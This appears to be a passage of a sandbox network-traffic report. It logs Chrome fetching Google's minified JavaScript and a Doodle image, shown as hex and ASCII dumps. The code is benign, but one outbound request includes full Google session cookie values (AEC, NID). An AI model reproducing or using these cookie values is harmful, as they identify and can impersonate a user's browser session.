2024-09-26 15:55:31 UTC	1390	IN	Data Raw: 61 29 3b 42 35 63 28 74 68 69 73 29 7d 3b 0a 76 61 72 20 42 35 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 6b 75 28 61 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 29 3b 5f 2e 79 35 63 28 22 66 73 22 29 3b 61 2e 6b 61 3f 5f 2e 6e 66 28 64 6f 63 75 6d 65 6e 74 2c 5f 2e 51 78 63 2c 61 2e 64 61 74 61 2e 4c 63 28 29 29 3a 5f 2e 6e 66 28 64 6f 63 75 6d 65 6e 74 2c 5f 2e 50 78 63 2c 61 2e 64 61 74 61 29 3b 5f 2e 6e 66 28 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2c 5f 2e 4a 77 62 29 3b 5f 2e 77 77 28 61 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 2c 22 68 69 64 65 5f 70 6f 70 75 70 22 29 3b 61 2e 74 61 26 26 61 2e 74 72 69 67 67 65 72 28 5f 2e 78 35 63 29 7d 3b 5f 2e 4c 28 41 35 63 2e 70 72 6f 74 6f 74 79 70 65 2c 22 79 4d 31 59 4a 65 22 Data Ascii: a);B5c(this)};var B5c=function(a){_.ku(a.getRoot().el());_.y5c("fs");a.ka?_.nf(document,_.Qxc,a.data.Lc()):_.nf(document,_.Pxc,a.data);_.nf(window.document.body,_.Jwb);_.ww(a.getRoot().el(),"hide_popup");a.ta&&a.trigger(_.x5c)};_.L(A5c.prototype,"yM1YJe"
2024-09-26 15:55:31 UTC	1390	IN	Data Raw: 64 22 29 2e 65 6c 28 29 3b 63 26 26 62 2e 70 75 73 68 28 63 29 3b 72 65 74 75 72 6e 20 62 7d 3b 5f 2e 6d 2e 55 38 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6b 75 61 7d 3b 0a 5f 2e 6d 2e 69 75 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 72 65 66 69 78 3d 22 22 7d 3b 76 61 72 20 4f 6e 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 43 50 28 29 3b 5f 2e 46 61 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72 20 64 3d 61 2e 6b 61 28 63 29 3b 69 66 28 64 2e 69 73 53 65 6c 65 63 74 65 64 28 29 26 26 64 2e 69 73 45 6e 61 62 6c 65 64 28 29 29 73 77 69 74 63 68 28 64 2e 67 65 74 54 79 70 65 28 29 29 7b 63 61 73 65 20 32 3a 50 6e 63 28 61 29 3b 64 2e 71 72 28 21 30 29 3b 61 2e 77 61 3d 63 3b 62 72 Data Ascii: d").el();c&&b.push(c);return b};_.m.U8c=function(){return this.kua};_.m.iuc=function(){this.prefix=""};var Onc=function(a){var b=a.CP();_.Fa(b,function(c){var d=a.ka(c);if(d.isSelected()&&d.isEnabled())switch(d.getType()){case 2:Pnc(a);d.qr(!0);a.wa=c;br
2024-09-26 15:55:31 UTC	1390	IN	Data Raw: 2e 6d 3d 5f 2e 73 7a 2e 70 72 6f 74 6f 74 79 70 65 3b 5f 2e 6d 2e 54 71 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 77 61 7d 3b 5f 2e 6d 2e 68 39 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 43 61 7d 3b 5f 2e 6d 2e 64 75 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 61 7d 3b 0a 5f 2e 6d 2e 4e 43 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 54 71 28 29 3b 72 65 74 75 72 6e 20 61 3f 74 68 69 73 2e 6b 61 28 61 29 2e 67 65 74 43 6f 6e 74 65 6e 74 28 29 3a 22 22 7d 3b 5f 2e 6d 2e 6b 4c 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 43 50 28 29 5b 30 5d 3b 72 65 74 75 72 6e 20 61 3f 74 68 69 73 2e 4a 57 28 61 29 3a 6e 75 Data Ascii: .m=_.sz.prototype;_.m.Tq=function(){return this.wa};_.m.h9c=function(){return this.Ca};_.m.duc=function(){return this.oa};_.m.NCa=function(){var a=this.Tq();return a?this.ka(a).getContent():""};_.m.kLb=function(){var a=this.CP()[0];return a?this.JW(a):nu
2024-09-26 15:55:31 UTC	1390	IN	Data Raw: 7d 3b 5f 2e 6d 2e 65 75 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6f 61 3d 3d 3d 6e 75 6c 6c 26 26 51 6e 63 28 74 68 69 73 2c 74 68 69 73 2e 43 50 28 29 5b 30 5d 29 7d 3b 5f 2e 6d 2e 66 75 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 3b 5f 2e 4a 65 28 61 2c 5f 2e 4b 6e 63 29 7d 3b 5f 2e 6d 2e 67 75 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 3b 5f 2e 4a 65 28 61 2c 5f 2e 4c 6e 63 29 3b 51 6e 63 28 74 68 69 73 2c 6e 75 6c 6c 29 7d 3b 5f 2e 6d 2e 68 75 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 61 3d 55 6e 63 28 61 29 29 26 26 51 6e 63 28 74 68 69 73 2c 61 2c 21 30 29 7d 3b 0a 5f 2e 6d 2e 57 6a 3d 66 75 6e Data Ascii: };_.m.euc=function(){this.oa===null&&Qnc(this,this.CP()[0])};_.m.fuc=function(){var a=this.getRoot().el();_.Je(a,_.Knc)};_.m.guc=function(){var a=this.getRoot().el();_.Je(a,_.Lnc);Qnc(this,null)};_.m.huc=function(a){(a=Unc(a))&&Qnc(this,a,!0)};_.m.Wj=fun
2024-09-26 15:55:31 UTC	1390	IN	Data Raw: 72 65 74 75 72 6e 20 63 3d 3d 3d 65 7d 29 2c 64 3d 5f 2e 4e 63 62 28 64 2c 62 3f 2d 61 2d 31 3a 2d 61 29 2c 61 3d 64 2e 66 69 6e 64 49 6e 64 65 78 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 63 3d 3d 3d 65 7d 29 29 3b 72 65 74 75 72 6e 20 64 7d 3b 0a 5f 2e 73 7a 2e 70 72 6f 74 6f 74 79 70 65 2e 48 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 26 26 28 74 68 69 73 2e 4f 61 28 61 29 2c 28 61 3d 74 68 69 73 2e 4a 57 28 61 29 29 26 26 61 2e 66 6f 63 75 73 28 29 29 7d 3b 0a 5f 2e 73 7a 2e 70 72 6f 74 6f 74 79 70 65 2e 4f 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 29 7b 76 61 72 20 63 3d 5f 2e 51 6c 2e 67 65 74 53 69 7a 65 28 74 68 69 73 2e 6d 65 6e 75 29 3b 69 66 28 63 2e 68 65 69 67 68 74 3c 74 68 69 73 2e 6d 65 6e 75 2e 73 63 Data Ascii: return c===e}),d=_.Ncb(d,b?-a-1:-a),a=d.findIndex(function(e){return c===e}));return d};_.sz.prototype.Ha=function(a){a&&(this.Oa(a),(a=this.JW(a))&&a.focus())};_.sz.prototype.Oa=function(a,b){if(a){var c=_.Ql.getSize(this.menu);if(c.height<this.menu.sc
2024-09-26 15:55:31 UTC	1390	IN	Data Raw: 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 43 50 7d 29 3b 5f 2e 4c 28 5f 2e 73 7a 2e 70 72 6f 74 6f 74 79 70 65 2c 22 6d 4a 36 30 6a 62 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 50 37 63 7d 29 3b 5f 2e 67 72 28 5f 2e 4d 6e 63 2c 5f 2e 73 7a 29 3b 0a 5f 2e 79 28 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 79 75 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 6b 29 7b 76 61 72 20 6c 3d 5f 2e 24 77 62 28 63 29 2c 70 3d 5f 2e 51 6c 2e 67 65 74 42 6f 75 6e 64 73 28 61 29 2c 72 3d 5f 2e 51 6c 2e 42 5f 28 61 29 3b 72 26 26 5f 2e 76 41 61 28 70 2c 5f 2e 74 41 61 28 72 29 29 3b 5f 2e 51 6c 2e 48 50 64 28 70 2c Data Ascii: tion(){return this.CP});_.L(_.sz.prototype,"mJ60jb",function(){return this.P7c});_.gr(_.Mnc,_.sz);_.y();}catch(e){_._DumpException(e)}try{_.yu=function(a,b,c,d,e,f,g,h,k){var l=_.$wb(c),p=_.Ql.getBounds(a),r=_.Ql.B_(a);r&&_.vAa(p,_.tAa(r));_.Ql.HPd(p,
2024-09-26 15:55:31 UTC	1390	IN	Data Raw: 2b 63 2e 77 69 64 74 68 3e 65 2e 72 69 67 68 74 26 26 28 63 2e 77 69 64 74 68 3d 4d 61 74 68 2e 6d 69 6e 28 65 2e 72 69 67 68 74 2d 67 2e 78 2c 68 2b 63 2e 77 69 64 74 68 2d 65 2e 6c 65 66 74 29 2c 63 2e 77 69 64 74 68 3d 4d 61 74 68 2e 6d 61 78 28 63 2e 77 69 64 74 68 2c 30 29 2c 64 7c 3d 34 29 7d 67 2e 78 2b 63 2e 77 69 64 74 68 3e 0a 65 2e 72 69 67 68 74 26 26 66 26 31 26 26 28 67 2e 78 3d 4d 61 74 68 2e 6d 61 78 28 65 2e 72 69 67 68 74 2d 63 2e 77 69 64 74 68 2c 65 2e 6c 65 66 74 29 2c 64 7c 3d 31 29 3b 66 26 32 26 26 28 64 7c 3d 28 67 2e 78 3c 65 2e 6c 65 66 74 3f 31 36 3a 30 29 7c 28 67 2e 78 2b 63 2e 77 69 64 74 68 3e 65 2e 72 69 67 68 74 3f 33 32 3a 30 29 29 3b 67 2e 79 3c 65 2e 74 6f 70 26 26 66 26 34 26 26 28 67 2e 79 3d 65 2e 74 6f 70 2c 64 7c Data Ascii: +c.width>e.right&&(c.width=Math.min(e.right-g.x,h+c.width-e.left),c.width=Math.max(c.width,0),d\|=4)}g.x+c.width>e.right&&f&1&&(g.x=Math.max(e.right-c.width,e.left),d\|=1);f&2&&(d\|=(g.x<e.left?16:0)\|(g.x+c.width>e.right?32:0));g.y<e.top&&f&4&&(g.y=e.top,d\|
2024-09-26 15:55:31 UTC	1390	IN	Data Raw: 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 76 75 3d 5f 2e 4a 28 22 42 55 59 77 56 62 22 29 3b 5f 2e 47 77 62 3d 5f 2e 4a 28 22 4c 73 4c 47 48 66 22 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 77 28 22 44 50 72 65 45 22 29 3b 0a 5f 2e 7a 75 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 41 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2e 4d 61 29 3b 76 61 72 20 62 3d 74 68 69 73 3b 74 68 69 73 2e 6b 61 3d 31 3b 74 68 69 73 2e 6f 66 66 73 65 74 59 3d 74 68 69 73 2e 6f 66 66 73 65 74 58 3d 30 3b 74 68 69 73 2e 4b 61 3d 74 68 69 73 2e 4e 61 3d 74 68 69 73 2e 43 61 3d 21 31 3b 74 68 69 73 2e 64 61 74 61 3d 61 2e 6a 73 64 61 74 61 2e 41 35 63 3b Data Ascii: e){_._DumpException(e)}try{_.vu=_.J("BUYwVb");_.Gwb=_.J("LsLGHf");}catch(e){_._DumpException(e)}try{_.w("DPreE");_.zu=function(a){_.A.call(this,a.Ma);var b=this;this.ka=1;this.offsetY=this.offsetX=0;this.Ka=this.Na=this.Ca=!1;this.data=a.jsdata.A5c;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.16	49783	142.250.186.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:30 UTC	791	OUT	GET /logos/2024/popcorn/rc4/preload-bg-sprite.jpg HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
2024-09-26 15:55:31 UTC	692	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="doodle-eng" Report-To: {"group":"doodle-eng","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/doodle-eng"}]} Content-Length: 44346 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Wed, 25 Sep 2024 19:16:08 GMT Expires: Thu, 25 Sep 2025 19:16:08 GMT Cache-Control: public, max-age=31536000 Last-Modified: Wed, 25 Sep 2024 18:30:00 GMT Content-Type: image/jpeg Age: 74363 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:31 UTC	698	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 03 c0 02 1c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 01 05 06 03 04 07 ff c4 00 41 10 00 01 03 02 04 04 04 03 05 07 04 02 03 01 00 03 01 00 02 11 12 21 03 22 31 41 04 05 32 51 42 61 71 81 06 91 b1 13 14 52 a1 c1 15 23 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"A!"1A2QBaqR#
2024-09-26 15:55:31 UTC	1390	IN	Data Raw: 11 aa 62 c7 96 67 c8 73 49 ab cd 27 42 8a f2 bb 69 dd 2c 37 75 1d 3a 26 19 8e 80 d4 d8 3e c9 b5 8c ba 7c d7 29 cb d2 9e 43 5b 3b 9d d0 19 ce 79 fe e4 05 37 0c 12 4a ac 37 d1 59 73 f9 fd a4 23 76 05 54 4d 4e 24 ea 91 b9 b4 b7 f1 fa a9 38 06 ab a4 f3 37 94 dd 48 33 4d 94 57 81 2d 77 4a f5 f2 bc 3a f9 96 08 fe f5 e4 27 a6 76 d5 7a f9 53 e3 9a e0 65 de cb b4 ed 0a ef 75 cf a6 c6 ec 64 54 95 e4 51 fa 28 ae 87 67 d4 a8 7c 16 df 43 a1 4f bc e8 61 2e 6f 90 43 cb 43 ab d5 24 d0 d6 c5 e6 ca 08 86 46 a8 02 b9 77 70 a9 fe 21 78 3c 2e 08 aa 0d 76 1e ca d5 8f f0 1b 05 47 f1 19 14 f0 c2 9d 26 4f c9 57 77 49 33 89 1f ba 14 4f 34 e4 a9 06 1e df 30 a6 61 bd d4 19 35 65 84 9b 74 e6 cd b6 a7 64 93 0c ba 63 e4 90 01 4d d0 1a 1e 40 01 e1 f1 9f 4e a4 0f 92 b7 90 1c d3 4b a3 f3 Data Ascii: bgsI'Bi,7u:&>\|)C[;y7J7Ys#vTMN$87H3MW-wJ:'vzSeudTQ(g\|COa.oCC$Fwp!x<.vG&OWwI3O40a5etdcM@NK
2024-09-26 15:55:31 UTC	1390	IN	Data Raw: 71 3b ea a6 0b bc ca 89 cc 98 3f 2b 86 85 49 12 c5 2b c3 ce 4b 5d cb 1d dc 11 4f ac ab 19 ee d5 5b ce 63 f6 6b cf 72 3e aa 15 eb 2b 6c 76 53 ed 9b f5 4d 68 4b 35 3a 0e 8a 48 d7 2d c2 4d bc 91 28 23 34 a8 3d 22 35 0a 64 e8 3e 48 48 b7 aa 46 bd 96 d7 87 79 6f 0f 86 69 87 50 24 1d 96 2b c8 ad af 0c 03 78 5c 39 b8 a0 68 ae b1 cc b3 7e 43 8a 5d a6 6e a2 77 2d 84 4d 2d 92 a0 1a 9b 74 cb 2c c0 8a a0 20 4b 9d d8 15 2c a4 f8 5c 9f c8 e8 34 5d 0c d7 3d c9 cc bf f0 10 ab 60 bb d5 58 f3 c1 fc c9 d1 71 40 55 80 9d d2 37 36 97 a0 c7 ea a7 d2 4c 8d 11 03 dd 49 1f fb 4a 5f 4b 94 57 03 02 f5 6a bd bc 9f fd cf 0b df e8 ab fc 5d d7 bf 93 32 be 65 84 6a d2 49 f9 29 5b da 15 5f eb ab d3 58 21 be 8b 93 de 75 d7 c9 16 aa 36 d6 ea 3c 52 9e 79 e2 97 93 d0 db f9 22 cf eb d9 44 cb Data Ascii: q;?+I+K]O[ckr>+lvSMhK5:H-M(#4="5d>HHFyoiP$+x\9h~C]nw-M-t, K,\4]=`Xq@U76LIJ_KWj]2ejI)[_X!u6<Ry"D
2024-09-26 15:55:31 UTC	1390	IN	Data Raw: bd 3e 48 1e 77 1d 93 1e 94 7e 1d d0 1e 4e 62 03 b9 6f 10 47 6f d5 66 16 9f 99 b0 fe cc c6 97 6d 3f 9a cd 0e db 25 af 72 d4 c2 d3 fe 94 5e a4 14 d0 a4 65 91 b2 a8 e2 3f 25 2c ea 44 6d aa 91 fe 50 7b ae 86 bf 01 81 b8 58 63 68 11 1e 8b ac 7f 76 ab 9e 14 d0 cc d2 00 0b ac 0b 27 58 35 6d 20 76 d9 31 3f 3e e9 20 17 75 26 80 d6 c2 11 48 2b c3 ce 01 77 2d 7c d5 62 0c fb ee bd cb c7 cd 58 5f cb 71 33 74 c3 87 b1 51 af 59 5b 67 b2 9f 6c b5 aa 82 88 dd 37 53 91 39 52 6d e1 1b a2 3e 48 01 4c 20 06 76 0d 9d 96 db 86 61 6e 0b 03 f5 00 05 8c b3 56 cb 82 c5 2e e1 30 5f b1 10 ae b1 cc b3 fe 42 3f 10 ea 05 29 80 0d 63 8e aa 07 72 a4 67 4c b2 c0 32 d8 3f 20 8f 0a 61 d3 6d 52 c1 fc 4b a1 9a e7 b2 39 87 fe 02 15 59 3b 15 6b f1 06 1b 47 1e c2 35 2c cc 3d 15 3c d4 d8 0d 84 8d Data Ascii: >Hw~NboGofm?%r^e?%,DmP{Xchv'X5m v1?> u&H+w-\|bX_q3tQY[gl7S9Rm>HL vanV.0_B?)crgL2? amRK9Y;kG5,=<
2024-09-26 15:55:31 UTC	1390	IN	Data Raw: c6 30 fe d0 c6 cd 79 d5 70 fc 4b db cc d8 1b cc 31 7d 88 f9 2f 2d 07 28 4a 55 cc b6 ad 4f dd 10 e7 13 ea a6 06 fa 95 d2 23 d7 65 10 3a f7 5c 58 56 06 97 34 1b 09 ba d7 c0 a6 db 0b 7a 2c 95 b6 d1 6b 70 c9 38 4c 34 c1 20 7d 15 d6 7c 91 cd f0 80 2a 6a 23 35 d3 41 d1 34 65 f3 2a e6 79 6f 4b 8e 54 a0 66 ee 9a 0e c9 ad 4b a7 d9 01 e1 e6 77 e5 f8 db 5b f5 59 ab b7 dd 6a 39 8c 37 97 e3 4b 6d 1b 7a ac d9 19 9b d9 2f 77 98 69 e1 69 24 02 13 4f 65 20 0a 90 dd d5 26 c8 99 9e 4d f9 a9 4a 3a 9b 2d f6 5d 4a 5a fc 38 76 13 27 58 09 e3 32 56 01 f6 4c f3 00 ae 80 ee 13 ac 0a b9 10 1d 1e 6a 40 cb 6f 74 be 54 d9 74 fc 89 5d 70 01 2e 71 d0 6e bc fc c7 0b f9 7f 11 da 85 e9 8a 5d 75 c7 8c 05 dc 17 10 05 f2 1b 7b 2e 4f 12 95 b9 fa ae 25 8f ff 00 c9 37 87 a5 4c 6f dd 10 1d e6 92 Data Ascii: 0ypK1}/-(JUO#e:\XV4z,kp8L4 }\|j#5A4eyoKTfKw[Yj97Kmz/wii$Oe &MJ:-]JZ8v'X2VLj@otTt]p.qn]u{.O%7Lo
2024-09-26 15:55:31 UTC	1390	IN	Data Raw: 5a db aa 62 ae b9 04 7e f8 1b c4 29 5a da 0b 65 f5 4a e0 83 a8 52 c0 43 6c 9e 25 d6 ec a4 01 4b 42 71 8e 86 31 38 02 14 c5 3e 88 be da 21 14 c0 33 f5 4c 19 4d 23 30 4f 97 fe d1 10 d4 01 77 78 a3 cd 11 56 89 91 6f c2 ba 14 3c dc 3b ef ae cd 22 04 47 65 e1 8c be 65 7b 39 99 a7 98 3f db e8 bc b7 4a 55 cc b5 ec e9 05 67 54 14 11 99 3c 13 a2 88 ca a2 b4 bf a2 d3 f0 e0 0e 1d 80 35 da 68 56 68 e5 5a 2e 08 39 bc 26 1d 75 13 1b f6 57 5a e6 49 e6 6b 0f 41 ee 88 52 a1 5c cf 4c 65 40 e9 84 7a a2 10 1e 3e 66 07 ec fc 50 6d a7 ce 56 77 a9 69 79 9f fb 76 37 a7 ea b3 57 54 5d e5 a5 87 a4 fb 11 b2 04 21 4c 2a 8d a0 8e c8 64 d4 df 51 64 4a 91 d4 d3 56 e1 0e cb 58 3a 19 e8 9d 80 55 7b 21 99 9a d2 88 ef ba 71 85 20 e6 4c 32 d3 9b dd 40 b3 5d f9 a6 1d 3e 4b a8 a0 c5 20 2e 3c Data Ascii: Zb~)ZeJRCl%KBq18>!3LM#0OwxVo<;"Gee{9?JUgT<5hVhZ.9&uWZIkAR\Le@z>fPmVwiyv7WT]!L*dQdJVX:U{!q L2@]>K .<
2024-09-26 15:55:31 UTC	1390	IN	Data Raw: a2 a2 f0 a5 2e ed 2d ac 3e a8 27 89 04 29 28 2a 06 44 65 f2 57 5f 0f b0 fd ae 31 cd 60 2d b2 a5 56 ff 00 0f 97 7d ef 16 34 a2 ea 56 f6 85 19 5d 52 bf 37 72 64 22 3b 27 18 60 66 4f 09 40 4d 08 07 a6 fd 48 53 d5 a6 c9 81 1f 87 dd 75 c2 5d 4d b7 53 d3 50 d5 41 03 53 a2 1d 66 b8 c2 4f 1b 8d 3f 8c dd 71 95 db 8c 25 dc 5e 34 fe 32 17 13 d5 e4 93 9e 65 b5 46 b0 51 10 a0 7e 4a 64 55 6b 20 81 55 d7 12 1e 15 a3 e0 e5 bc 26 14 b6 0c 68 b3 67 e8 b4 7c 10 2d e0 b0 a7 58 56 5a e6 49 e6 6b 0f 42 6f 14 28 9a 9c a5 30 cf 09 61 35 d1 e2 40 79 f8 d9 6f 03 8c 45 b2 1d 56 5e cb 49 cd 0c 72 fc 5e 9b c0 fc d6 73 c9 2f 77 98 69 61 c7 f8 99 2f 4b 53 42 0f 9a 8f 0f 9a ac da 08 34 c2 94 78 91 e1 b2 e3 b2 d7 e1 f4 36 75 b5 93 7a b5 26 14 fd 8e 1f 78 1f 45 d6 73 5d be a9 d6 15 5c 96 Data Ascii: .->')(*DeW_1`-V}4V]R7rd";'`fO@MHSu]MSPASfO?q%^42eFQ~JdUk U&hg\|-XVZIkBo(0a5@yoEV^Ir^s/wia/KSB4x6uz&xEs]\
2024-09-26 15:55:31 UTC	1390	IN	Data Raw: 69 b0 66 aa 9c ab 5e 40 07 df 5f dc 32 ca cb 7b 41 7c ae aa 9a 2b 39 4a 14 0f 2d 13 8c 24 a5 4d 64 a8 0e c4 8d 10 37 ec 80 22 c9 e0 1f 45 d7 1c b7 ec 99 11 ff 00 4a 7a 9d ff 00 28 75 94 e2 c9 fb de 35 76 35 9f aa 49 f9 a7 e2 40 1c 5e 30 ec f3 f5 5c ce 64 94 f3 2d ca 35 80 f1 b9 d1 28 22 a4 14 46 5b a1 2f a1 3b ad 27 2c 35 72 f6 1a 61 66 88 f6 5a 9e 09 94 70 58 22 a7 1c 83 5f a2 b2 cf 32 4f 37 48 77 4a 9c 66 77 64 46 64 cb 34 22 0a 11 ea 80 f0 f3 56 17 f2 f7 9c b9 48 2b 35 e6 b5 3c cf fd b7 18 9e df aa cc 11 96 6a 4b de e5 a7 85 3f e2 7d 94 49 72 08 3e ea 3a 94 89 73 60 aa 0e 8f cd 47 8a 14 f4 d2 2a b0 40 eb 07 cd 75 d9 6c f0 e5 b8 2c de c3 cb 64 c2 2a 48 ce 96 c6 90 17 42 0d 2e fc d3 af 3f 57 24 26 9a 86 c9 ac df 24 02 05 32 db 29 89 d5 b0 ba 8a 2c 2e aa Data Ascii: if^@_2{A\|+9J-$Md7"EJz(u5v5I@^0\d-5("F[/;',5rafZpX"_2O7HwJfwdFd4"VH+5<jK?}Ir>:s`G@ul,dHB.?W$&$2),.
2024-09-26 15:55:31 UTC	1390	IN	Data Raw: 2e af 7e 1e bf de 7f f1 b7 cd 51 7a 2b ef 87 83 a9 e2 27 a4 91 07 69 52 b5 b4 14 cb e9 95 d7 9a 34 f7 47 4a 09 ca 9c 62 84 22 0f ba 83 aa 03 d0 83 dd 31 2d aa 4b a5 2b 2e a4 e0 39 6f b9 4a 47 48 a6 ea 2e a6 e1 d7 5c 0c af 34 86 f3 2c 78 75 ab bf aa f3 9c b6 1a 15 df 99 ff 00 b9 71 19 a6 5f 2b cb e8 92 af 99 6f 5b d2 13 64 09 08 8a 91 b7 9a 8a d1 77 3a 16 cb 0e 5a c6 03 ac 09 3e cb 20 c8 0e 83 7f 25 b0 11 4d da 98 b3 e5 9b 9f fc 82 09 6f a2 60 21 be aa 04 d3 65 0c 39 95 ec e0 75 72 3f 14 26 f0 a0 8c b3 f9 20 3c 9c 7b 0b b9 6f 11 fe 12 b2 9a 3a 56 af 8f 13 c0 f1 03 4c 85 65 00 dc ec 96 bd cc 35 30 35 94 5b 52 87 90 80 6a 77 92 93 1a 85 49 f1 ff 00 8c 20 4f b2 9d 50 01 6b 66 ad f4 5d 72 5b 4c 38 fb 26 51 6c 81 30 9d 4f ba 4c 32 3e c9 84 37 50 0d d3 c4 d2 4e Data Ascii: .~Qz+'iR4GJb"1-K+.9oJGH.\4,xuq_+o[dw:Z> %Mo`!e9ur?& <{o:VLe505[RjwI OPkf]r[L8&Ql0OL2>7PN
2024-09-26 15:55:31 UTC	1390	IN	Data Raw: f2 c9 a2 c4 ec b4 10 5c e2 a9 be 1e 70 0e c6 6d 2d 24 c1 27 75 78 09 a3 d4 dd 37 6b 58 63 66 4f ed 97 3e 97 27 9a 90 40 a5 06 96 db 34 ab 0a a0 76 aa 11 d0 e2 14 d9 cd 9d f6 28 30 50 e2 9f e2 07 ff 00 09 83 de b3 f4 59 d1 f2 57 7f 10 17 57 80 3c 37 33 e6 a9 c9 cd 25 be 49 3b bb 4b 6f 0e 3e ad 43 99 07 55 20 a9 24 ee a2 3b 28 19 41 9d 56 83 e1 f8 fb ae 36 6b d6 24 7b 2c fd cb 7a 95 ef c3 c4 53 8e cf 36 9f aa 9d ad a0 b6 67 54 ae e7 65 0a 4c 20 26 d8 a0 c7 e1 45 5f da 81 25 07 54 07 a6 00 77 7f a2 88 2e 69 cd 71 b2 23 bd bb a2 41 6c 05 27 1c fc 3d 88 41 22 2c df 54 c7 32 2b cb 76 e8 a2 ec 72 c5 bf a9 c6 98 04 94 bf aa 9c 42 d2 f7 c3 61 a4 92 02 91 fe 49 27 a1 a7 82 f4 b5 01 95 6b ea 98 8c b6 4b d2 d0 57 1d 17 5a ee 0c 87 70 3c 39 a6 e5 83 4d 16 47 47 79 2d Data Ascii: \pm-$'ux7kXcfO>'@4v(0PYWW<73%I;Ko>CU $;(AV6k${,zS6gTeL &E_%Tw.iq#Al'=A",T2+vrBaI'kKWZp<9MGGy-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.16	49780	2.18.97.153	443

Timestamp	Bytes transferred	Direction	Data
